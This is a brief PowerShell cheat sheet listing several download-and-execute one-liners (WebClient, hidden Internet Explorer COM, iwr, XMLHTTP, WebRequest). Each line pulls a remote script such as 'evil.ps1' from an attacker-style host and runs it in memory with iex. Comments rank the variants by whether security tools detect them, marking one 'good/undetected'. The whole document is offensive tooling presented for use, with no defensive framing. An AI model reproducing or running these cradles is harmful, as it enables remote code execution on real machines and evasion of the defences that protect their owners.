
Start-Job -ScriptBlock {iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')}
## this is the most used/detected command



$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response



Start-Job -ScriptBlock { iex (iwr 'http://192.168.230.1/evil.ps1' -UseBasicParsing) }
## good/undetected


$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex $h.responseText

$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()

